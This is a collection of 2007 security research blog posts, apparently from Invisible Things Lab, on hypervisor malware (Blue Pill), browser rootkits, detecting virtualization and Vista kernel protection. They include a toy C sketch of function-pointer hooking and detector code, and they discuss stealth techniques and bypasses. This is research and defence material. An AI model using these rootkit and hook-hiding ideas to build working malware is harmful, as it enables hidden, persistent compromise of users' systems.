Thursday, October 25, 2007

Razor-Thin Hypervisors

I just came back from Stockholm, where I attended the Virtualization Forum and saw several quite interesting vendor presentations. One that caught my attention was a talk by VMware, especially the part that presented the new ESX 3i hypervisor as "razor-thin". This "razor-thin" hypervisor will have, according to VMware, a footprint of "only 32MB".

My regular readers might sense that I'm being a bit ironic here. Well, 32MB of code is definitely not a "razor-thin" hypervisor in my opinion; it's not even close to a thin hypervisor... But why am I so picky about it? Is it really that important?

Yes, I think so, because the bigger the hypervisor, the greater the chance that there is a bug somewhere in there. And one of the reasons for using virtual machines is to provide isolation. Even if we use virtualization for business reasons (server consolidation), we still want each VM to be properly isolated, to make sure that if an attacker "gets into" one VM, she will not be able to 0wn all the other VMs on the same hardware… In other words, isolation of VMs is an extremely important feature.

During my presentation I also talked about thin hypervisors. I first referenced a few bugs that were found in various VMMs in recent months by other researchers (congrats to Rafal Wojtczuk of McAfee for some interesting-looking bugs in VMware and Microsoft products). I used them as an argument that we should move towards a very thin hypervisor architecture, exploiting hardware virtualization extensions as much as possible (e.g. Nested Paging/EPT, IOMMU/DEV/NoDMA, etc.) and avoiding doing things "in software".

Nobody should really be surprised to see VMM bugs – after all, we have seen so many bugs in OS kernels over the years, so it's no surprise that we will see more and more bugs in VMMs, unless we switch to very thin hypervisors, so thin that it would be possible for one person to understand and verify their code. Only then would we be able to talk about a security advantage (in terms of isolation) offered by VMMs compared to traditional OSes.

I couldn't refrain from mentioning that the existence of those bugs in popular VMMs clearly shows that having a VMM already installed doesn't currently protect against the "Blue Pill threat" – a point often made by some virtualization vendors, who persistently try to diminish the importance of this problem (i.e. the problem of virtualization based malware).

I also announced that Invisible Things Lab has just started working with Phoenix Technologies. Phoenix is the world leader in system firmware, particularly known for providing BIOSes for PCs for almost 25 years, and is currently working on a new product called HyperCore, which will be a very thin and lightweight hypervisor for consumer systems. ITL will be helping Phoenix ensure the security of this product.

The HyperCore hypervisor will use all the latest hardware virtualization extensions, e.g. Nested Paging/EPT, to minimize unnecessary complexity and to keep the performance impact negligible. For the same reasons, I/O access will go through almost natively, just like in the case of our Blue Pill...

Speaking of Blue Pill – Phoenix is also interested in further research on Blue Pill, which will be used as a test bed for trying out various ideas – e.g. nested virtualization, which might be adopted in future versions of HyperCore to allow users to run other commercial VMMs inside their already-virtualized OSes. Blue Pill's small size and minimal functionality make it a convenient tool for experimenting. Phoenix will also support The Blue Pill Project, which means that some parts of our research will be available to other researchers (including code)!

In case you still feel like having a look at my slides, you can get them here.

Wednesday, October 17, 2007

Thoughts On Browser Rootkits

Petko D. Petkov from GNUCITIZEN wrote a post about Browser Rootkits, which inspired me to give some more thought to this subject. Petko is an active researcher in the field of client-side exploits (e.g. the recent Adobe Acrobat PDF flaw), so it's no surprise that he's thinking about browsers as a natural environment for rootkits or malware. It's also quite common to hear these days that browsers have become so complicated and so universal that they are almost operating systems rather than just standard applications.

In his post, Petko gives several ideas for how browser-based malware could be created, and I'm sure that we will see more and more such malware in the near future (I would actually be surprised if it didn't exist already). His main argument for creating "Browser Rootkits" is that they would be "closer to the data", which is, of course, indisputable.

The other argument is the complexity of a typical browser like Firefox or Internet Explorer. It seems we have a very similar situation here to what we have with "classic" operating systems like Windows. Windows is so complex that nobody (including Microsoft) can really spot all the sensitive places in the kernel where a rootkit might "hook" – thus it's not possible to effectively monitor all those places. We have a similar problem with Firefox and IE because of their extensible architecture (think of all those plugins, add-ons, etc.) – although we could examine the whole memory of the firefox.exe process, we would still not be able to decide whether something bad is in there or not.

I'm even quite sure that my little malware taxonomy could be used here to classify Firefox or IE infections. E.g. type 0 browser malware would be nothing more than additional plugins, installed using the official API and not trying to hide from the browser's reporting mechanisms (in other words, they would still be visible to users who ask the browser to list all installed plugins). And we would have type I and type II infections: the former would simply modify some code (be it the code of the browser or of some other plugin), while the latter would only hook some function pointers or change some data – all in order to hide the offensive module.
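To make the distinction concrete, here is a toy C sketch (everything in it is made up for this post – no real browser internals involved): a type I infection would patch code bytes, while a type II infection only swaps a function pointer, i.e. data, and leaves all code sections intact.

#include <stdio.h>

/* Toy illustration only - "on_navigate" stands in for some internal browser callback. */
typedef void (*handler_t)(const char *url);

static void real_handler(const char *url) { printf("loading %s\n", url); }
static void evil_handler(const char *url) { printf("silently stealing credentials for %s\n", url); }

static handler_t on_navigate = real_handler;   /* data the browser calls through */

int main(void)
{
    on_navigate("https://bank.example");        /* clean behavior */

    /* Type II: no code bytes change, only this function pointer (data) does. */
    on_navigate = evil_handler;
    on_navigate("https://bank.example");

    /* Type I would instead overwrite the bytes of real_handler itself
     * (e.g. patch its prologue with a jump) - code, not data, gets modified. */
    return 0;
}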

BTW, there is a little problem with classifying JIT-generated code – should it be a type I or a type II infection? I don't know the answer yet and I welcome all feedback on this. We can even imagine type III infections of browsers, but I will leave that as an exercise for my readers :)

So, should we expect the classic, OS-based rootkits to die and the efforts in the malware community to move towards creating browser-based rootkits? I don't think so. While browser-based malware is, and definitely will be, a more and more important problem, it has one disadvantage compared to classic OS-based malware. Namely, it's quite easy to avoid, or at least to minimize the impact of, browser-based rootkits. It is enough to use two different browsers – one for sensitive and the other for non-sensitive operations.

So, for example, I use IE to do all my sensitive browsing (e.g. online banking, blogger access, etc.), and Firefox for all the casual browsing, which includes morning press reading, Google searching, etc. The reason I use Firefox for non-sensitive browsing doesn't come from the fact that I think it's more secure (or better written) than IE, but because I like using NoScript and there is no similar plugin for IE...

Of course, an attacker still might exploit my non-sensitive browser (Firefox) and then modify configuration or executable files that are used by my sensitive browser (IE). However, this would require write access to those files. This is yet another reason why one should run the non-sensitive browser with limited privileges, and technologies like UAC in Vista help achieve that. I wrote an article some time ago about how one can configure Vista to implement almost-full privilege separation.

Of course, even if we decide to use two different browsers – one for sensitive and the other for non-sensitive browsing – an attacker still might be able to break out of the account protection via a kernel mode exploit (e.g. exploiting one of the bugs that Alex and I presented in Vegas this year). However, this would not be browser malware anymore – it would be good old kernel-mode malware :)

A solution to this problem will probably be the use of a virtual machine to run the non-sensitive browser. Even today one can download e.g. the Browser Appliance from VMware, and I think we will see more and more solutions like this in the coming years. This, BTW, will probably stimulate more research into VM escaping and virtualization-based malware.

Of course, the very important and sometimes non-trivial question is how to decide which type of browsing is sensitive and which is non-sensitive. E.g. most people will agree that online banking is sensitive browsing, but what about webmail? Should I use my sensitive or non-sensitive browser for accessing my mail via the web? Using the sensitive browser for webmail is dangerous, as it's quite possible that it could be infected via some malicious mail sitting in our inbox. But using the non-sensitive browser for webmail is not a good solution either, as most people would like to consider mail sensitive and would not want the possibly-compromised browser to learn the password for the mailbox.

I avoid this problem by not using a browser for webmail and by having a special account just for running the Thunderbird application (see again my article on how to do this in Vista). It works well for me.

Of course, one could also do the same for browsers – i.e. instead of having two browsers (sensitive and non-sensitive), one could have three or more (maybe even three different virtual machines). But the question is how many accounts we should use: one for email, one for sensitive browsing, one for non-sensitive, one for accessing personal data (e.g. pictures)...? I guess there is no good answer to this and it depends on the specific situation (i.e. a home user who uses the computer mostly for "fun" needs a different configuration than somebody using the same computer for both work and "fun", etc...)

On a side note – I really don't like the idea of using a web browser to do "everything" – I like using the browser for browsing, and specialized applications for other things. I like having my data on my local hard drive. It's quite amazing that so many people these days use Google not only for searching, but also for email, calendaring and document editing – it's like handing over all your life's secrets on a plate! Google can now correlate all your web search queries with a specific email account, see who you are meeting with tomorrow evening, and even know what new product your company will be presenting next week, since you prepared your presentation using Google Documents. I'm not sure whether it's Google or people's naivety that disturbs me more...

Friday, August 31, 2007

Tricky Tricks

I want to make a short philosophical comment about how some approaches to building security are wrong.

Let's move back in time to the last decade of the 20th century, to the '90s... Back in those days, one of the most annoying problems in computer security was viruses or, more precisely, executable file infectors. Many smart guys were working on both sides to create stealthier infectors and also better detectors for those infectors…

The Russian virus writer Z0mbie, with his Mistfall engine and Zmist virus, probably went closest to the Holy Grail in this arms race – the creation of an undetectable virus. Peter Szor, Symantec's chief antivirus researcher, wrote about this work in 2001:

Many of us will not have seen a virus approaching this complexity for a few years. We could easily call Zmist one of the most complex binary viruses ever written.

But nothing is really undetectable if you have a sample of the malware in your lab and can spend XXX hours analyzing it – you will always come up with some tricks to detect it sooner or later. The question is – were any of the A/V scanners back then ready to detect such an infection if it was a 0day in the wild? Would any of today's scanners detect a modified/improved Zmist virus, or would they have to count on the virus author being nice enough to send them a sample for analysis first?

Interestingly, file infectors stopped being a serious problem a few years ago. But this didn't happen because the A/V industry discovered a miracle cure for viruses, but rather because users' habits changed. People do not exchange executables as often as 10 years ago. Today people download an executable from the Web (legally or not) rather than copying it from a friend's computer.

But could the industry have solved the problem of file infectors in an elegant, definitive way? The answer is yes, and we all know the solution – digital signatures for executable files. Right now, most of the executables (but unfortunately still not all) on the laptop I'm writing this text on are digitally signed. This includes programs from Microsoft, Adobe, Mozilla and even some open source ones like e.g. TrueCrypt.

With digital signatures we can "detect" any kind of executable modification, starting from the simplest and ending with the most complex, metamorphic EPO infectors as presented e.g. by Z0mbie. All we need to do (or, more precisely, what the OS needs to do) is verify the signature of an executable before executing it.
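On Windows such a check already exists in the form of Authenticode, and a loader-side verification could look roughly like the sketch below (a minimal example of the documented WinVerifyTrust API, with revocation checking and most error handling omitted; the target path is just an example):

#include <windows.h>
#include <wintrust.h>
#include <softpub.h>
#include <stdio.h>
#pragma comment(lib, "wintrust")

/* Returns ERROR_SUCCESS (0) if the file carries a valid, trusted Authenticode
 * signature; any other value means unsigned, tampered with, or untrusted. */
static LONG verify_signature(LPCWSTR path)
{
    WINTRUST_FILE_INFO file = { sizeof(file) };
    WINTRUST_DATA wd = { sizeof(wd) };
    GUID policy = WINTRUST_ACTION_GENERIC_VERIFY_V2;
    LONG status;

    file.pcwszFilePath = path;
    wd.dwUIChoice = WTD_UI_NONE;              /* no dialogs */
    wd.fdwRevocationChecks = WTD_REVOKE_NONE;
    wd.dwUnionChoice = WTD_CHOICE_FILE;
    wd.pFile = &file;
    wd.dwStateAction = WTD_STATEACTION_VERIFY;

    status = WinVerifyTrust((HWND)INVALID_HANDLE_VALUE, &policy, &wd);

    wd.dwStateAction = WTD_STATEACTION_CLOSE; /* release the verification state */
    WinVerifyTrust((HWND)INVALID_HANDLE_VALUE, &policy, &wd);
    return status;
}

int main(void)
{
    /* example target - any signed executable will do */
    LONG status = verify_signature(L"C:\\Windows\\System32\\notepad.exe");
    printf("WinVerifyTrust returned 0x%08lx (%s)\n", (unsigned long)status,
           status == ERROR_SUCCESS ? "signature OK" : "not trusted");
    return 0;
}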

I hear all the counter arguments: that many programs out there are still not digitally signed, that users are too stupid to decide which certificates to trust, that sometimes the bad guys might be able to obtain a legitimate certificate, etc...

But all those minor problems can be solved and probably will be solved in the coming years. Moreover, solving them will probably cost much less than all the research on file infectors has cost over the last 20 years. But that also means no money for the A/V vendors.

Does that mean we get a secure OS this way? Of course not! Digital signatures do not protect against malicious code execution, e.g. they can't stop an exploit from executing its shellcode. So why bother? Because certificates allow us to verify that what we have is really what we should have (e.g. that nobody has infected any of our executable files). It's the first step in ensuring the integrity of an OS.

The case of digital signatures vs. file infectors is a good example of how problems in security should be addressed. But we all know that the A/V industry took a different approach – they invested zillions of dollars into research on polymorphic virus detection, built advanced emulators for the analysis of infected files, etc. The outcome: lots of complex heuristics that usually work quite well against known patterns of infection, but are often useless against new 0day engines, and that are so complex that nobody really knows how many false positives they can produce or how buggy the code itself is. Tricks! Very complex and maybe even interesting (from a scientific point of view) tricks.

So, do I want to say that all those years of A/V research on detecting file infections were a waste of time? I'm afraid that is exactly what I want to say here. This is an example of how the security industry took a wrong path, a path that could never lead to an effective and elegant solution. This is an example of how people decided to employ tricks, instead of looking for generic, simple and robust solutions.

Security should not be built on tricks and hacks! Security should be built on simple and robust solutions. Oh, and we should always assume that the users are not stupid – building solutions to protect uneducated users will always fail.

Friday, August 03, 2007

Virtualization Detection vs. Blue Pill Detection

So, it's all over the press now, but, as usual, many people didn't quite get the main points of our Black Hat talk. So, let's clear things up... First, please note that the talk was divided into two separate, independent parts – the first one about bypassing Vista kernel protection and the second one about virtualization based malware.

The message of the first part was that we don’t believe it’s possible to implement effective kernel protection on any general purpose OS based on monolithic kernel design.

The second part, the one about virtualization, had several messages...
  1. The main point was that detecting virtualization is not the same as detecting virtualization based malware. As hardware virtualization technology gets more and more widespread, many machines will be running with virtualization mode enabled, whether blue pilled or not. In that case blue pill-like malware doesn't need to pretend that virtualization is not enabled, as it's actually expected that virtualization is being used for some legitimate purpose. In that case, using a "blue pill detector" that is in fact just a generic virtualization detector is completely pointless.

    Obviously, in such scenarios blue pill-like malware must support nested hypervisors. And this is what we have implemented in our New Blue Pill. We can run tens of blue pills inside each other and they all work! You can try it yourself, but you should disable COM-port debug output to run more than twenty nested pills. We still fail at running Virtual PC 2007 as a nested hypervisor (when its guest switches to protected mode), but we hope to have this fixed in the coming weeks (please note that VPC's hypervisor doesn't block blue pill from loading – see our slides for more info).

    In other words, if somebody announces to the world that they can fight virtualization based malware using generic virtualization detectors, it's as if they said they could detect e.g. a botnet agent just by detecting that an executable uses networking!

  2. We also decided to discuss how blue pill could potentially cheat those generic virtualization detectors, even though we don't believe it will be necessary in the coming years, as everything will be virtualized anyway (see the previous point). But we still decided to look into some of the SVM detection methods. First, we found out that many methods that people described as a way to detect virtualization do not work in the simple form in which they were described. We took a closer look e.g. at the TLB profiling methods that were suggested by several researchers as a reliable method for virtualization detection. However, all the papers describing this method missed the fact that some of the caches are not fully associative, and one needs special effort (which means additional complexity) to make sure to e.g. fill the whole L2 TLB. Obviously we provided all the necessary details of how to write those detectors properly (we even posted one such detector; a toy sketch of the basic timing idea appears right after this list).

    In other words – we believe that it will always be possible to detect virtualization mode using various tricks and hacks, but: 1) those hacks can be forced to be very complex, and 2) if virtualization is being used on the target computer for some legitimate purpose, all those methods fail anyway (see point 1).

  3. Some people might argue that maybe we should then build these virtualization detectors into all the legitimate hypervisors (e.g. the Virtual PC hypervisor), so that they at least know whether they are running on a native machine or maybe inside a blue pill. However, this approach contradicts the rules we use to build secure and effective hypervisors. These rules say that hypervisors should be as small as possible and that no 3rd party code should be allowed in there.

    Now imagine an A/V company trying to insert its virtualization detectors (which, BTW, would have to be updated from time to time to support e.g. new processor models) into hypervisors – if that ever happened, it would be a failure of our industry. We need other methods to address this threat, methods based on documented, robust and simple approaches. Security should not be built on bugs, hacks and tricks!
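For the curious, here is a toy user-mode sketch of the naive TLB-timing idea mentioned in point 2 (assumptions: MSVC intrinsics, a single idle CPU, and none of the associativity handling a real detector needs – which is exactly the complexity the papers glossed over): touch a set of pages so their translations get cached, force an instruction the hypervisor must intercept, and check whether re-touching the pages suddenly got slower because the world switch flushed the TLB.

#include <stdio.h>
#include <stdlib.h>
#include <intrin.h>

#define PAGES 64
#define PAGE  4096

/* Naive sketch only - NOT the real detector: it ignores TLB/cache associativity,
 * SMP, interrupts etc., which is exactly why such simple versions are unreliable. */
static unsigned __int64 walk(volatile unsigned char *buf)
{
    unsigned __int64 t0 = __rdtsc();
    for (int i = 0; i < PAGES; i++)
        (void)buf[i * PAGE];             /* each access needs its own TLB entry */
    return __rdtsc() - t0;
}

int main(void)
{
    volatile unsigned char *buf = (unsigned char *)_aligned_malloc(PAGES * PAGE, PAGE);
    int regs[4];

    walk(buf);                           /* warm up: populate the TLB entries */
    unsigned __int64 warm = walk(buf);   /* baseline walk with a warm TLB */

    __cpuid(regs, 0);                    /* intercepted instruction -> #VMEXIT if a hypervisor is present */

    unsigned __int64 after = walk(buf);  /* noticeably slower if the world switch flushed the TLB */

    printf("warm=%llu after=%llu\n", warm, after);
    _aligned_free((void *)buf);
    return 0;
}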

We posted the full source code of our New Blue Pill here. We believe it will help other researchers analyze this threat, and hopefully we will find a good solution soon, before this ever becomes widespread.

Happy bluepilling!

On a side note: now I can also explain (if this is not clear already) how we were planning to beat our challengers. We would simply ask them to install Virtual Server 2005 R2 on all the test machines and we would install our New Blue Pill on just a few of them. Then their wonderful detectors would simply detect that all the machines have SVM mode enabled, but that would be completely useless information. Yes, we still believe we would need a couple of months to get our proof-of-concept to a level where we would be confident of winning anyway (e.g. if they used memory scanning for some "signature").

BTW, you might be wondering why I introduced the "no CPU peak for more than 1s" requirement? I will leave finding the answer as an exercise in psychology for my dear readers ;)

Thursday, June 28, 2007

We're ready for Ptacek's challenge!

Thomas Ptacek and company just came up with this funny challenge to test our Blue Pill rootkit. And, needless to say, the Invisible Things Lab team is ready to take their challenge, however with some additional requirements that would ensure the fairness of the contest.

First, we believe that 2 machines are definitely not enough, because the chance of a correct guess using a completely random (read: unreliable) detection method is 50%. Thus we think that the reasonable number is 5 machines. Each of them could be in state 0 or 1 (i.e. infected or not). On each of these machines we install two files: bluepill.exe and bluepill.sys

The .sys file is digitally signed, so it loads without any problem (we could use one of our methods for loading unsigned code on Vista that we're planning to demonstrate at BH, but this is not part of the challenge, so we will use the official way).

The bluepill.exe takes one argument, which is 0 or 1. If it's 1, it loads the driver and infects the machine. If it's 0, it also loads the driver, but the driver does not infect the machine.

So, on each of the 5 machines we run bluepill.exe with randomly chosen argument, being 0 or 1. We make sure that at least one machine is not infected and that at least one machine is infected.

After that, the detection team runs their detector.exe executable on each machine. This program cannot take any arguments and must return only one value: 0 or 1. It must act autonomously – no human assistance when interpreting the results.

The goal of the detection team is to correctly mark each machine as either being infected (1) or not (0). The chance of a blind guess is:

1/(2^5 - 2) = 1/30 ≈ 3%

The detector cannot cause a system crash or halt the machine – if it does, they lose. The detector cannot consume a significant amount of CPU time (say > 90%) for more than, say, 1 second. If it does, it's considered disturbing for the user and thus impractical.

The source code of our rootkit as well as the detector should be provided to the judges at the beginning of the contests. The judges will compile the rootkit and the detector and will copy the resulting binaries to all test machines.

After the completion of the contest, regardless of who wins, the sources for both the rootkit and the detector will be published on the Internet – for educational purposes, to allow others to research this subject.

Our current Blue Pill has been in development for only about 2 months (please note that we do not have the rights to use the previous version developed for COSEINC) and it is more of a prototype, intended primarily for our training in Vegas, rather than a "commercial grade rootkit". Obviously we will be discussing all the limitations of this prototype during our training. We believe that we would need about 6 months of full-time work by 2 people to turn it into the kind of commercial grade creature that would win the contest described above. We're ready to do this, but we expect somebody to compensate us for the time spent on this work. We would expect an industry standard fee for this work, which we estimate at $200 USD per hour per person.

If Thomas Ptacek and his colleagues are so certain that they have found a panacea for virtualization based malware, then I'm sure that they will be able to find sponsors willing to financially support this challenge.

As a side note, the description for our new talk for Black Hat Vegas has just been published yesterday.

Friday, May 18, 2007

Invisible Things Lab, Bitlocker/TPM bypassing and some conference thoughts

Invisible Things Lab's website is now online! However, we still don't have a cute logo, because the company where I ordered the logo presented me with something completely unacceptable and disappointing after taking a week to prepare it :( Alex is really pissed off by this and I hope we will find something nice really soon...

Anyway, as you can see on the website, we don’t have any product and we focus on consulting and research-on-demand only. We mainly target three groups of customers:

First, there are security vendors and OS vendors, to whom we offer our product assessment and advisory services. E.g. we can take a look at the design and implementation of a rootkit detector, host IPS or some custom hardened OS, point out all the weaknesses we see, and also give advice on what we think should be improved. We can advise on both the design and the implementation side, sometimes without requiring that all the product's internal information be shared with us.

The other group is corporate customers interested in an unbiased evaluation of security technology they're planning to deploy. Here we can look at the products they are considering, point out the pros and cons of each of them and suggest the best choice. So e.g. we can look at various "information leak protectors" and tell how sophisticated the techniques required to bypass each of them are (because, of course, all such products are bypassable). We can also advise on various technical aspects of implementing corporate security policies.

Finally there are law enforcement customers and forensic investigators, whom we can help to stay up-to-date with current offensive technology as used e.g. by modern malware, by running various trainings and seminars. We can also share our experience with advanced stealth malware and covert channels to help investigate more sophisticated incidents.

OK, so what don't we do? Well, we do not do classic code auditing, understood as looking for implementation bugs like e.g. buffer overflows or race conditions. We still do implementation analysis when e.g. assessing a product, but we look only at the feature-specific parts of the implementation – e.g. how the kernel protection or hooking has been implemented in a given host IDS.

We also don't do web application security or database security. There are people who have much more experience in this area than we have, so go to them!

Finally, we do not do penetration testing, simply because I don't believe this is the best way of improving system security. I can run 101 exploits against your server and even if all of them fail, it still says nothing about how secure your system is. Maybe there is some little detail I missed which caused all my exploits to fail just because I was tired that day? I would definitely prefer to talk to the security team and also to the server admin and ask them what they have done to secure the server in the first place. If I thought that their approach had some weakness, then I would simply advise them on what I think they should improve. Later I would kindly ask them to give me root/admin access so that I could verify for myself whether the advice has been implemented... This approach has the advantage of being much more complete and usually taking much less time than standard pen-testing. It has one disadvantage though – it's not good material for a Hollywood movie ;)

So, all in all, we focus on OS security, in contrast to application security and network security (although we can be helpful with detecting covert channels in a corporate environment).

Speaking of OS security (and leaving the subject of my new company for a second) – I recently had the pleasure of giving a keynote speech at the NLUUG conference in the Netherlands, which this year was focused on virtualization technology. The conference was really nice (even though 2/3 of the talks were in Dutch) and there were a couple of talks I liked in particular. First, there was a talk about microhypervisor verification by Hendrik Tews. The author presented an overview of the Nizza architecture (which was interesting, but in my opinion way too complicated and impractical for use anywhere outside the lab). He also talked about the challenges of formal verification of kernels and microkernels, which was very interesting. I talked to him later about the feasibility of verifying monolithic kernels, like those in Linux or Windows, and, not surprisingly, he said it's not really possible today or in the coming years, because of the cost (I should mention that he does the verification "manually").

There was also a nice presentation about the Kernel Virtual Machine Monitor (KVM) for Linux by one of its developers, Avi Kivity. I think in the future it might be strong competition for Xen, especially after they add support for IOMMU technology (which I think is expected to be introduced on AMD and Intel processors somewhere in 2008). I really like the design of KVM, which takes advantage of many features already present in the Linux kernel without implementing them from scratch.

Finally, there was a presentation by another Polish female researcher, Asia (Joanna) Slowinska. She talked about Prospector, a system built on top of a CPU emulator (based on Qemu) to automatically generate generic signatures for buffer overflow attacks (both heap and stack based). On a side note, Asia (which by the way is pronounced "Ashyia" and not like the continent!) is the short form of the name Joanna, so basically almost everybody in Poland calls me Asia as well ;)

There was also a talk by Anil Madhavapeddy of XenSource, but in my opinion it was a bit too much of a "marketing" presentation rather than a technical one (even though Anil turned out to be a very technical and knowledgeable guy).

I also had some meetings at the Vrije Universiteit in Amsterdam the following day, where I met with the MINIX3 developers and prof. Andrew Tanenbaum (what a fool I was that I didn't bring one of his famous books to get an autograph :/). I must say I really like the design of MINIX3, which keeps all the drivers (and other system components) in usermode, in separate address spaces. This is, however, still problematic today, as without an IOMMU we can't really fully protect the kernel from usermode drivers, because of potential DMA attacks – i.e. a driver can set up a DMA write transaction to overwrite some part of the microkernel's memory, thus owning the system completely. But I guess we will all have processors supporting IOMMU within the next 1-2 years.

Just two days ago I delivered another keynote presentation, this time at the InfoSecurity conference in Hong Kong, organized by Computer World. My speech was about "Human Factor vs. Technology" and basically the message I tried to convey was that the technology is just as flawed as the so-called "human factor", understood here as users' unawareness and administrators' incompetence. I guess this is perfectly obvious to most technical security people who have written at least one exploit themselves. But apparently not to the security management staff... So, even though it was by far the least technical speech I have ever given in my life, it was received as way too technical by many attendees (who were like "OMG, that was a shock!"). And I didn't even mention any specific research I've done – just some standard stuff about exploits etc...

I also took part in a discussion panel with several C-level executives, some of them being CIOs for some huge institutions, others being C-level marketing guys from several security vendors.

So, I must say I was really struck by the complete lack of understanding of even the basic technical concepts behind IT security shown by some of the management people who were there. I understand, of course, that a typical CIO or CSO doesn't need to know much about the technical details of how exploits and malware work, but their naivety was really shocking!

Speaking of conferences, I owe apologies to the organizers of the Confidence 2007 conference in Krakow, Poland. After spending several days in the Netherlands, experiencing their rainy weather, and also because of the shortage of sleep in recent weeks due to traveling (especially the lack of my afternoon naps), I got sick and couldn't make it to the conference. I heard it was very good this year, featuring many international speakers and, of course, Krakow, which is one of the nicest cities in Poland.

Finally, I would like to explain a little confusion around our Black Hat training. Shortly after we announced the training, some press articles appeared which incorrectly described the kernel attacks that we're going to present in Vegas. In the original blog post I said that these attacks "work on the fly and do not require system reboot and are not afraid of the TPM/Bitlocker protection", but some people understood that we were going to actually present ways to defeat Bitlocker Drive Encryption (BDE). This is quite a misunderstanding, because those attacks, which allow for inserting unsigned code into the Vista x64 kernel, are "not afraid of TPM/Bitlocker" simply because they can be executed on the fly and thus do not require a system reboot, while Bitlocker's task is to secure the boot process, not to protect the kernel against compromises!

However, I intentionally mentioned TPM and Bitlocker just to stress that those technologies have simply nothing to do with stopping rootkits and kernel compromises, provided you're using kernel attacks which do not require a system reboot, even though they're often advertised as if they did… So, basically, even if we could break the BDE, it still wouldn't give us any benefit these days. The situation will change within 2-3 years or so, i.e. when Microsoft eventually comes up with its own hypervisor, but that's a different story...

Friday, April 20, 2007

Understanding Stealth Malware



Ever wondered whether Blue Pill really works or was just a PR stunt? Ever wanted to see how practical various timing attacks against it are? (And whether even the "unpractical" ones can be cheated?) Or how many Blue Pills inside each other you can run and still be able to play your favorite 3D game smoothly? Or how deep Alex can hook into Windows NDIS to bypass your personal firewall? Do you want to see Patch Guard from a "bird's eye view" perspective? Or do you simply want to find out how well the latest Vista x64 kernel is protected? Ever wondered how rootkits like Deepdoor and Firewalk really worked? You can't sleep, because you're constantly thinking about how Blue Pill-like malware can be prevented? Does Northbridge hacking sound sexy to you? :)

At the very end of July, during the Black Hat Briefings in Las Vegas, Alex Tereshkin and I will be running a training “Understanding Stealth Malware”, where you should be able to find answers to the above questions plus many more.

The training will feature many previously unpublished techniques, implementation details, and of course lots of brand new code, developed especially for the training. The code will include sample rootkits similar to Deepdoor, Firewalk, Blue Pill and Delusion (but redesigned and rewritten from scratch) as well as some more exotic things, like e.g. anti-hardware-forensic attacks.

As the training will be focused on Windows platform and Vista x64 specifically, we will also present some new kernel attacks against latest Vista x64 builds. These attacks, of course, work on the fly and do not require system reboot and are not afraid of the TPM/Bitlocker protection. (Although they could also be used to bypass Vista DRM protection, this subject will not be discussed during the training).

Attendees will mostly work with kernel debuggers in order to analyze and understand various techniques used in system compromises. The main goal of the training is to help students understand contemporary malware techniques, enable them to see the “bigger picture” over technical details and show possible approaches to compromise detection.

Thus the course is primarily targeted at developers of security products, forensic investigators, pen-testers and OS developers. It's recommended that attendees have a basic knowledge of OS design and implementation (specifically Windows), C programming, at least basic experience with debugging, and the ability to understand fragments of assembly code (IA32 architecture).

For ethical reasons we want to limit the availability of this course to only "legitimate" companies, thus we require that you specify your official business email address and company's website when registering for the course.

Pre-configured workstations will be provided, so there is no need to prepare for the course in any specific way. You can find more information and register for the training on the blackhat website. Please note that there will be only 2 public classes of this training this year – both during the Black Hat Briefings (28/29 and 30/31 of July). More classes will be available only in the form of on-site trainings for corporate customers.

Please also note that the number of seats is hard-limited by the number of available workstations, so we encourage registering early.

As for the other news – I quit COSEINC just last week and I'm in the process of establishing a new security consulting and research company. For now I can only reveal the name: Invisible Things Lab – expect more details to be posted here in the coming weeks :)

Sunday, April 01, 2007

The Human Factor

When you go to some security conferences, especially those targeted at management staff, you might get the impression that the only problem in the security field that mankind is facing today is… that we're too stupid and do not know how to use the technology properly. So we use silly, simple passwords, allow strangers to look at our laptop screens over our shoulders, happily provide our e-banking credentials or credit card numbers to whoever asks for them, etc… Sure, that's true indeed – many people (both administrators and users) make silly mistakes, and this is very bad and, of course, they should be trained not to make them.

However, we also face another problem these days… A problem of no less importance than "the human factor". Namely, even if we were perfectly trained to use the technology and understood it very well, we would still be defenseless in many areas. Just because the technology is flawed!

Think about all those exploitable bugs in the WiFi drivers in your laptop, or about vulnerabilities in your email client (e.g. in your GPG/PGP software). The point is, you, as a user, cannot do anything to prevent exploitation of such bugs. And, of course, the worst thing is that you don't even have any reliable way to tell whether somebody actually attacked you successfully or not – see my previous post. None of the so-called "industry best practices" can help – you just need to hope that your system hasn't been 0wned. And this is really disturbing…

Of course, you can choose to believe in all this risk assessment pseudo-science, which can tell you that your system is "non-compromised with 98% probability", or you can try to comfort yourself knowing that your competition has no better security than you… ;)

Monday, March 26, 2007

The Game Is Over!

People often say that once an attacker gets access to the kernel, the game is over! That's true indeed these days, and most of the research I have done over the past two years or so was about proving just that. Some people, however, go a bit further and say that there is thus no point in researching ways to detect system compromises, and that once an attacker gets in, you should simply assume everything has been compromised and replace all the components, i.e. buy a new machine (as the attacker might have modified the BIOS or re-flashed PCI EEPROMs), reinstall the OS, all applications, etc.



However, they miss one little detail – how can they actually know that the attacker got access to the system, that the game is indeed over, and that it's time to reinstall right now?

Well, we simply assume that the attacker had to make some mistake and that we, sooner or later, will find out. But what if she didn’t make a mistake?

There are several schools of thought on how this problem should be addressed in a more general and elegant way, though. Most of them are based on a proactive approach. Let's have a quick look at them…
  1. One generic solution is to build prevention technology into the OS. That includes all the anti-exploitation mechanisms, like e.g. ASLR, non-executable memory, Stack Guard/GS, and others, as well as some small design changes to the OS, like e.g. implementation of the least-privilege principle (think e.g. UAC in Vista) and some sort of kernel protection (e.g. securelevel in BSD, grsecurity on Linux, signed drivers in Vista, etc.).

    This has undoubtedly been the most popular approach for the last couple of years, and recently it has become even more popular, as Microsoft implemented most of those techniques in Vista.

    However, everybody who has followed security research for at least several years should know that all those clever mechanisms have been bypassed at least once in their history. That includes attacks against Stack Guard protection presented back in 2000 by Bulba and Kil3r, several ways to bypass PaX ASLR, like those described by Nergal in 2001 and by others several months later, as well as the privilege elevation bug in PaX discovered by its author in 2005. Also, Microsoft's hardware DEP (AKA NX) was demonstrated to be bypassable by skape and Skywing in 2005.

    Similarly, kernel protection mechanisms have also been bypassed over the past years, starting e.g. with this nice attack against grsecurity /dev/(k)mem protection presented by Guillaume Pelat in 2002. In 2006 Loic Duflot demonstrated that BSD's famous securelevel mechanism can also be bypassed. And, also last year, I showed that Vista x64 kernel protection is not foolproof either.

    The point is – all those hardening techniques are designed to make exploitation harder or to limit the damage after a successful exploitation, but not to be 100% foolproof. On the other hand, it must be said, that they probably represent the best prevention solutions available for us these days.

